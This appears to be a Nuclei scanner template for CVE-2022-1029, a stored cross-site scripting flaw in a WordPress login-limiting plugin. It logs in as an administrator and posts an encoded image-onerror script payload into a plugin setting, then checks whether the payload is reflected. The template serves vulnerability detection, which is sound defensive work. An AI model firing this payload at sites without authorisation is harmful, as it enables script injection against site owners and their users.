id: CVE-2022-1029 info: name: Limit Login Attempts - Stored Cross-Site Scripting author: theamanrawat severity: medium description: | Limit Login Attempts WordPress plugin < 4.0.72 contains a stored cross-site scripting caused by unsanitized and unescaped settings, letting malicious administrators inject Javascript code, exploit requires administrator privileges. impact: | Attackers with administrator privileges can execute malicious Javascript in the context of the site, potentially stealing cookies or hijacking user sessions. remediation: | Update to version 4.0.72 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1029 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-1029 epss-score: 0.00185 epss-percentile: 0.39977 cwe-id: CWE-79 metadata: verified: true max-requests: 2 public-www: "/wp-content/plugins/miniorange-limit-login-attempts/" tags: cve,cve2022,wordpress,wp,wp-plugin,miniorange-limit-login-attempts,xss,authenticated flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - status_code == 302 - contains(header, "wordpress_logged_in") condition: and internal: true - raw: - | POST /wp-admin/admin.php?page=advancedblocking HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option=mo_wpns_block_referrer&referrer_1=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "referrerblockingtable", "

")' condition: and # digest: 4a0a004730450221008216adcefedac8c2b40b1c90f7dbe792c81c1a28e83fcc38779ff81089df225902203f4b71323baad7c52197e84decc01825cf7dcf8d399a6339279cab8216966496:922c64590222798bb761d5b6d8e72950